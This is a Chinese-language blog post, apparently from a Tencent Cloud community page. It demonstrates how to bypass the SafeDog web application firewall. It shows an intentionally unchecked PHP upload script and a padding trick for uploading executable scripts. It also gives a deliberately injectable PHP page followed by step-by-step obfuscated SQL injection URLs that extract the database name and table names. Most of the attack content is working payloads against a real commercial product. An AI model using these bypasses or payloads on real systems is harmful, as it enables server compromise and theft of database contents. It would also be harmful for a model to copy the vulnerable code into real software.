SQL注入 上传绕过安全狗

一,绕过安全狗上传可执行脚本 附上php上传脚本源码,此源码未对上传文件类型做校验 <?php         move_uploaded_file($_FILES["file"]["tmp_name"],"./" . $_FILES["file"]["name"]);         echo "Stored in: " . "./" . $_FILES["file"]["name"]; ?> <form action="" method="post" enctype="multipart/form-data"> <input type="file" name="file" id="file" />  <input type="submit" name="submit" value="Submit" /> </form>   ------------- 绕过方法,工具:burpsuite 1,用 php脚本或者js,python等其他语言,生成48930个字符 <?php  for ($i=0; $i <= 48930; $i++) {          echo 'o'; } ?> 2,抓包,改包   3,添加后如图:   4,查看当前目录,上传成功1 二,sql注入绕过安全狗 1,测试文件,明显的字符型 SQL注入 <?php         header("Content-type: text/html; charset=utf-8");         $link = mysql_connect("localhost","root","root");         mysql_select_db("test",$link);         $sql = "select * from cms where id='{$_GET['id']}'";         echo $sql;         echo '<br>-----------------------------<br>';         $res = mysql_query($sql);         while ( $rows = mysql_fetch_array($res)) {                 echo $rows[0];                 echo $rows[1];                 echo $rows[2];         } ?> 2,正常运行界面   3,添加注入测试语句 http://localhost/waf123.php?id=3' and 1=1 --+   4,修改测试语句 http://localhost/waf123.php?id=3'/*!and*/%202e1/**/=2e1--+   5,暴库 http://localhost/waf123.php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*.1112*//**//*!*/(select@1/**/,2,database/**/(),4,5))--+    6,爆表 http://localhost/waf123.php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*.1112*//**//*!*/(select@1/**/,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=0x74657374))--+   

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏康怀帅的专栏

PHP curl 详解

本文详细记录了 PHP 使用 curl 遇到的问题。 官方文档:http://php.net/manual/zh/book.curl.php 设置网址 curl...

3317
来自专栏云计算教程系列

如何在Debian 9上设置SSH密钥

SSH或安全shell是用于管理服务器和与服务器通信的加密协议。使用Debian服务器时,您可能会将大部分时间花在通过SSH连接到服务器的终端会话中。

2533
来自专栏虚拟化云计算

虚拟机磁盘加密之LUKS

LUKS是一种基于device mapper机制的加密方式。使用加密磁盘前要先mapper映射,映射时需要输入密码,写入和读取磁盘时不需要再输入密码。LUKS可...

1252
来自专栏中国白客联盟

绕过黑名单的命令执行tips(二)

发现了什么?也就是说我可以利用环境变量取值来取出我们想要的东西。比如我们现在来绕过空格执行命令

942
来自专栏快乐八哥

Angular企业级开发(9)-前后端分离之后添加验证码

1.背景介绍 团队开发的项目,前端基于Bootstrap+AngularJS,后端Spring MVC以RESTful接口给前端调用。开发和部署都是前后端分离。...

37910
来自专栏Hongten

python开发_tempfile

 如果你的应用程序需要一个临时文件来存储数据,但不需要同其他程序共享,那么tempfile模块来创建临时文件(夹)是个不错的选择

1042
来自专栏linux系统运维

Nginx负载均衡,ssl原理,生成ssl密钥对,Nginx配置ssl

2464
来自专栏blueslu

实战撸Https 利用Let’s Encrypt在Ubuntu 16.04上配置免费的Https

$ sudo apt-get update $ sudo apt-get install software-properties-common $ sudo ...

1564
来自专栏linux运维学习

linux学习第四篇:克隆虚拟机以及两台linux机器相互登录

克隆虚拟机 1.      克隆 ? ? ? 之后自己命名克隆的虚拟机并自己选择存放位置,完成克隆 2.      克隆虚拟机之后对新的虚拟机修改网络配置,以免...

1859
来自专栏云计算教程系列

如何在Ubuntu 16.04上使用Stunnel加密流量到Redis

Redis是一个开源键值数据存储,使用内存存储模型和可选的磁盘写入来实现持久性。它具有事务,发布/订阅消息传递模式以及其他功能之间的自动故障转移功能。Redis...

2394

扫码关注云+社区